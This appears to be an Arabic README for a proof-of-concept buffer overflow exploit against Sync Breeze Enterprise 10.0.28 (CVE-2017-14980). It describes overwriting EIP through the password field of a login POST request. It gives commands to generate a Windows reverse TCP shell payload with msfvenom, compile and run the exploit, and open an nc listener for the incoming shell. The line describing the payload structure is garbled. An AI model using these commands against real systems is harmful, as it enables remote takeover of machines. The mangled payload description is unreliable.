
إثبات مفهوم لاستغلال تجاوز السعة المخزنية لـ Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). يرسل حمولة HTTP POST مصممة للكتابة فوق EIP وتنفيذ شيل كود x86 مخصص لتنفيذ أكواد عشوائية.
يحتوي هذا المستودع على استغلال تجاوز سعة المخزن المؤقت (BOF) كدليل على المفهوم لـ Sync Breeze Enterprise الإصدار 10.0.28، ويستهدف الثغرة المعروفة باسم CVE-2017-14980.
توجد الثغرة بسبب التحقق غير السليم من الإدخال عند معالجة حقل password في طلب POST إلى نقطة النهاية /login.
يمكن للمهاجم إرسال قيمة طويلة للغاية في هذا الحقل، مما يؤدي إلى الكتابة فوق EIP ويسمح بتنفيذ تعليمات عشوائية.
يُرسل هذا الاستغلال حمولة مصممة بعناية تتكون من:
'A')password.gcc)\x83\x0C\x09\x10) والشيلكود إذا لزم الأمرمثال على توليد الشيلكود باستخدام msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444